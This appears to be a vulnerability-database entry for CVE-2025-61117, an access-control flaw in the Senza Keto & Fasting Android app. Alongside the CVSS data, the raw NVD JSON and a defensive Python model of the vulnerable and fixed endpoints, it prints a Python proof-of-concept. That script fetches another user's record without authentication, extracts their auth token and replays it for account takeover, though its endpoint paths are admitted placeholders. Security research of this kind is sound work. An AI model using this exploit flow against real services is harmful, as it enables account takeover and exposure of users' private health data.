Security Vulnerability Report
CVE-2025-61117 CVSS 7.5 HIGH

CVE-2025-61117

Published: 2025-10-30 16:15:36
Last Modified: 2026-04-15 00:35:42

Description

Senza: Keto & Fasting Android App version 2.10.15 (package name com.gl.senza), developed by Paul Itoi, contains an improper access control vulnerability. By exploiting insufficient checks in user data API endpoints, attackers can obtain authentication tokens and perform account takeover. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform.
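The advisory describes the classic CWE-284 shape: a user-data endpoint that trusts the identifier in the request and serialises the whole account record, credential included, for any caller. The following Python model is an added example written for this page, not code from the Senza app or the researcher's advisory; the endpoint shape, field names and sample users are constructed assumptions. It places the vulnerable handler beside a hardened one that authenticates the caller, binds the requested user id to that caller, and strips the credential from the response.

```python
# Added example (not the Senza app's code): a minimal model of an
# "insufficient checks in user data API endpoints" defect and its fix.
# The request shape, field names and USERS records are constructed
# assumptions for illustration only.
import hmac
from dataclasses import dataclass, field

# Constructed sample user store; tokens are placeholders.
USERS = {
    "1001": {"email": "alice@example.invalid", "auth_token": "tok-alice-" + "a" * 16},
    "1002": {"email": "bob@example.invalid", "auth_token": "tok-bob-" + "b" * 16},
}


@dataclass
class Request:
    """Hypothetical request: the user id from the URL path plus HTTP headers."""
    path_user_id: str
    headers: dict = field(default_factory=dict)


def _caller_from_bearer(headers):
    """Resolve a bearer token to the user id it belongs to, or None.

    Constant-time comparison so token lookup does not leak by timing."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    presented = auth[len("Bearer "):]
    for uid, rec in USERS.items():
        if hmac.compare_digest(presented, rec["auth_token"]):
            return uid
    return None


def user_data_vulnerable(req):
    """CWE-284 handler: no authentication, no ownership check, and the full
    record (auth_token included) is returned to whoever supplies the id."""
    rec = USERS.get(req.path_user_id)
    if rec is None:
        return 404, {"error": "not found"}
    return 200, dict(rec)


def user_data_fixed(req):
    """Hardened handler: require a valid bearer token, require that the id in
    the URL is the caller's own, and never emit the credential field."""
    caller = _caller_from_bearer(req.headers)
    if caller is None:
        return 401, {"error": "authentication required"}
    if caller != req.path_user_id:
        return 403, {"error": "forbidden"}
    rec = USERS.get(req.path_user_id)
    if rec is None:
        return 404, {"error": "not found"}
    public = {k: v for k, v in rec.items() if k != "auth_token"}
    return 200, public


def demo():
    """Exercise both handlers with an anonymous caller, a cross-user caller
    and the legitimate owner; returns {case: (status, body)}."""
    anon = Request("1002")
    alice_asking_for_bob = Request(
        "1002", {"Authorization": "Bearer " + USERS["1001"]["auth_token"]})
    bob_self = Request(
        "1002", {"Authorization": "Bearer " + USERS["1002"]["auth_token"]})
    return {
        "vuln_anon": user_data_vulnerable(anon),
        "fixed_anon": user_data_fixed(anon),
        "fixed_cross_user": user_data_fixed(alice_asking_for_bob),
        "fixed_self": user_data_fixed(bob_self),
    }


if __name__ == "__main__":
    for name, (status, body) in demo().items():
        print(f"{name}: {status} {body}")
```

The two checks in `user_data_fixed` are independent and both matter: authentication alone still allows any logged-in user to read any other user's record, and ownership binding alone does nothing if the response leaks a credential that can then be replayed against every other endpoint. Treating the credential as write-once (issued at login, never echoed back) closes the token-harvesting path the advisory describes even if a future handler forgets the ownership check.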

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Network-reachable, low complexity, no privileges and no user interaction. Note that the vector scores confidentiality only (C:H, I:N, A:N) even though the description claims account takeover, which would normally also carry an integrity impact; the 7.5 therefore reflects the token disclosure alone.

Configurations (Affected Products)

No configuration data available in the NVD record.

Senza: Keto & Fasting App < 2.10.15 (package name: com.gl.senza). The NVD description names version 2.10.15 itself as affected, and no fixed version is published in the record.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61117 PoC - Senza Keto & Fasting App API Authentication Bypass
# This PoC demonstrates the improper access control vulnerability in the Senza app.
# Caveat: the endpoint paths (/api/v1/users/<id>/data, /api/v1/profile), the
# token field names and the example host are placeholders; the referenced
# advisory does not publish them, so adjust them to the real API before use.
import json
import sys

import requests


def exploit_senza_api(target_url, user_id):
    """
    Exploit improper access control to obtain authentication tokens and
    perform account takeover.

    Args:
        target_url: Base URL of the Senza API endpoint
        user_id: Target user ID to extract token for
    """
    headers = {
        'User-Agent': 'Senza/2.10.15 (Android)',
        'Content-Type': 'application/json',
        'Accept': 'application/json',
    }

    # Step 1: Attempt to access user data without authentication.
    # The API endpoint lacks proper authorization checks.
    endpoint = f"{target_url}/api/v1/users/{user_id}/data"
    print(f"[*] Targeting endpoint: {endpoint}")
    print("[*] Attempting to retrieve user data without authentication...")

    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            try:
                data = response.json()
            except ValueError:
                print("[-] 200 response but body is not JSON")
                return None
            print(f"[+] Success! Retrieved user data for user ID: {user_id}")

            # Step 2: Extract authentication token from response
            if 'auth_token' in data or 'token' in data:
                auth_token = data.get('auth_token') or data.get('token')
                print(f"[+] Extracted authentication token: {auth_token}")

                # Step 3: Use token for account takeover
                takeover_headers = headers.copy()
                takeover_headers['Authorization'] = f'Bearer {auth_token}'

                # Access sensitive endpoints with stolen token
                profile_endpoint = f"{target_url}/api/v1/profile"
                profile_response = requests.get(
                    profile_endpoint, headers=takeover_headers, timeout=10)
                if profile_response.status_code == 200:
                    print("[+] Account takeover successful!")
                    print(f"[+] Full profile data: "
                          f"{json.dumps(profile_response.json(), indent=2)}")
                return auth_token
            else:
                print(f"[+] User data retrieved but no token found: "
                      f"{json.dumps(data, indent=2)}")
                return None
        elif response.status_code == 401:
            print("[-] Authentication required - vulnerability may be patched")
            return None
        elif response.status_code == 403:
            print("[-] Access forbidden - proper authorization checks in place")
            return None
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return None


def main():
    if len(sys.argv) < 3:
        print("Usage: python senza_exploit.py <api_base_url> <target_user_id>")
        # Example host is a placeholder, not the app's real API hostname.
        print("Example: python senza_exploit.py https://api.senza-app.com 12345")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    user_id = sys.argv[2]

    print("=" * 60)
    print("CVE-2025-61117 PoC - Senza Keto & Fasting App")
    print("Improper Access Control leading to Account Takeover")
    print("=" * 60)

    exploit_senza_api(base_url, user_id)


if __name__ == "__main__":
    main()

References

https://kar1oz.notion.site/Senza-Keto-Fasting-2629a473ecb28079bce0dab884d912a2 (researcher's advisory, the only reference in the NVD record)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61117",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T16:15:36.397",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Senza: Keto & Fasting Android App version 2.10.15 (package name com.gl.senza), developed by Paul Itoi, contains an improper access control vulnerability. By exploiting insufficient checks in user data API endpoints, attackers can obtain authentication tokens and perform account takeover. Successful exploitation could result in unauthorized account access, privacy breaches, and misuse of the platform."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://kar1oz.notion.site/Senza-Keto-Fasting-2629a473ecb28079bce0dab884d912a2",
        "source": "[email protected]"
      }
    ]
  }
}